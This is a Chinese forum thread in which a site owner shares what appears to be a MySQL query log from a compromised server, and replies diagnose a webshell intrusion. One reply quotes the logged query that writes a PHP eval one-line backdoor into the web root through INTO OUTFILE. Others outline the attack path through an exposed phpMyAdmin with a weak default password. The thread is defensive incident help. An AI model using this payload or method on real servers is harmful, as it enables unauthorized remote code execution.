文件点这个链接(文件原是 php 文件,我改成 txt 了)
--
http://xiaozhangzaici.com/gg.txt
--
貌似全是 select 语句,而且还有时间和行号,难道是个 log 文件?这 php 文件能运行吗?
1
Sp4rr0w 2018-07-24 12:45:58 +08:00 via Android 1
这个应该是个查询记录文件,
2111 Query select '<?php @eval($_POST[ssss]);?>'INTO OUTFILE '/phpstudy/www/gg.php' 你看下 web 路径下面有没有 gg.php ,这的确是个 webshell 后门 |
2
zhangzilong 2018-07-24 14:10:34 +08:00 2
兄弟,快把数据库密码改了。
|
3
Biexl 2018-07-24 15:07:35 +08:00 2
赶紧改密码,now !!!
|
4
10467106 2018-07-24 15:08:09 +08:00 1
是,快处理吧。
|
5
collinswang 2018-07-24 16:10:03 +08:00 2
这是在抓微擎的漏洞,通过执行 MYSQL,生成一句话木马 gg.php
|
6
JinyAa 2018-07-24 16:13:59 +08:00 1
老哥 你这密码也太....
|
7
x86 2018-07-24 16:16:44 +08:00 1
老哥这还是默认密码啊
|
8
aliensb 2018-07-24 16:32:20 +08:00 2
phpmyadmin 就暴露出来了,然后黑客用弱口令进到你的 phpmyadmin,然后通过你的首页探针找到你网站的绝对路径,然后通过 MySQL 写文件向你的目录里面写了一个 php 一句话木马。
|
9
websafe 2018-10-30 15:19:00 +08:00
被上传了一句话 webshell,处理方法:先把可疑的文件 查看下修改时间 对比下 自己本地的备份文件 是否有 多余的文件 如果有的话就删除,再看下首页有无被修改 有的话就用备份替换上传 上去,但只能解决一时 还是会被反复篡改,治标不治本 建议找专业做安全的来处 理解决国内也就找 Sinesafe 和绿盟等可以专业的处理.
|